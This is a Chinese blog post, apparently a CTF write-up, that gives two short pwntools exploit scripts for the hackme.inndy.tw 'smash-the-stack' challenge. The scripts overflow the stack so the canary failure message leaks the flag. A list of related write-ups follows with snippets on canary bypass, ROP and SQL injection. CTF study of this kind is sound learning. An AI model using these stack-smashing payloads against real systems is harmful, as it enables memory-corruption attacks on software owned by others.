hackme pwn smash-the-stack [stack smash]

最新推荐文章于 2023-12-17 21:40:39 发布
原创 最新推荐文章于 2023-12-17 21:40:39 发布 · 390 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分享了两个使用Python编写的远程攻击脚本,通过向目标服务器发送精心构造的payload来获取flag。第一个脚本利用argv_addr和buf_addr之间的偏移量计算payload地址,第二个脚本则直接使用flag地址填充payload。

根据提示:stderr!和32C3的readme一样,原理看上篇,这里贴两个exp

#! /usr/bin/env python
# coding=utf-8
from pwn import *

#io = process('./smash-the-stack')
io = remote('hackme.inndy.tw', 7717)

argv_addr = 0xffffcfa4
buf_addr = 0xffffcee8
flag_addr = 0x804a060

payload = 'a' * (argv_addr - buf_addr) + p32(flag_addr)
io.recvuntil('the flag')
io.sendline(payload)
io.interactive()

另外一个:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

io = remote("hackme.inndy.tw", 7717)

flag_addr = 0x804A060
io.recvuntil("the flag\n")
payload = p32(flag_addr) * 0x300
io.sendline(payload)
io.interactive()

 

171119 Pwn-StackSmash
whklhhhh的博客
11-24 1067
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 1544
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 721
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
smashthestack的wp
一个码农的笔记
11-13 2377
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了smashthestack这个题目感觉还不错,我把wp分享出来,方便大家学习 smashthestack的要求是:nc hackme.inndy.tw 7717Tips: stderr is available, beware of the output这个题目提示利用错误输出 下面我用ida打开smash
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 556
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1524
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.youkuaiyun.com/qq_42192672/article...
浅谈PWN基础-栈溢出
qq_45751349的博客
04-04 824
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 二、简介栈 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时...
Jarvis OJ pwn wp - Tell Me Something + Smashes
fa1c4的blog
07-03 190
Tell Me Something 栈溢出, ret2text, 白给题, 但是要注意这里的调用约定不是标准的, 所以偏移量就是0x88, 不需要加8 add rsp, 0x88之后就ret了, 所以偏移为0x88, 不是根据IDA反编译的结果来判断 from pwn import * from pwnlib.util.cyclic import cyclic context(arch = 'amd64', os = 'linux', log_level = 'debug') sel = 1 fi
Wargames:io.smashthestack Level 2
请善待每一个被你欺负过的管理员 >_<
07-29 955
第二关,提供了2种通关方式。
pwn】[HNCTF 2022 WEEK3]smash --花式栈溢出
question55的博客
12-17 159
在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。
Smash The Stack Wargame IO Level 01-04
PuziのPwn
07-23 501
Ref:http://smashthestack.org/ Dat:20140707
stack的wp
一个码农的笔记
11-29 2234
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了stack这个题目感觉还不错,我把wp分享出来,方便大家学习 stack的题目要求是: nc hackme.inndy.tw 7716Here is my C programming homework But compiled with full protection (RELRO, PIE, NX, Sta
Hackme Writeup
热门推荐
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
Hackme CTF】Misc--corgi can fly
VZZmieshenquan的博客
04-21 986
Description: Corgi is cute, right? Pillow (Python) and Bitmap (.NET) are your friends. (Maybe you can try stegsolve) Solution: 点击链接后加载出一张图,下载下来 用stegsolve查看图片,发现一张二维码 扫描二维码获得flag Flag: FLAG{C...
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 597
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
hackme_Login As Admin 6
weixin_30252709的博客
10-23 151
先上源码: 然后发现了一个存在很大漏洞的函数——extract() 众所周知,它有一个最大的漏洞——变量覆盖,即可以通过我们提交的变量把脚本中原来的变量覆盖掉! 通过阅读代码,可以知道它是用$users这个变量来验证我们提交的是否有效, 所以除了提交username&password之外,我们还需要提交一个users,来把原来的$user覆盖掉 所以如此...
hackme login as admin 0
weixin_43511698的博客
10-18 836
hackme 简单sql注入题 进入题目页面提示查看源码(关键代码如下) function safe_filter($str) { $strl = strtolower($str); if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') || strstr($strl, 'update') || strstr($s...
hackme(web wp)
Xi4or0uji
09-06 4522
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值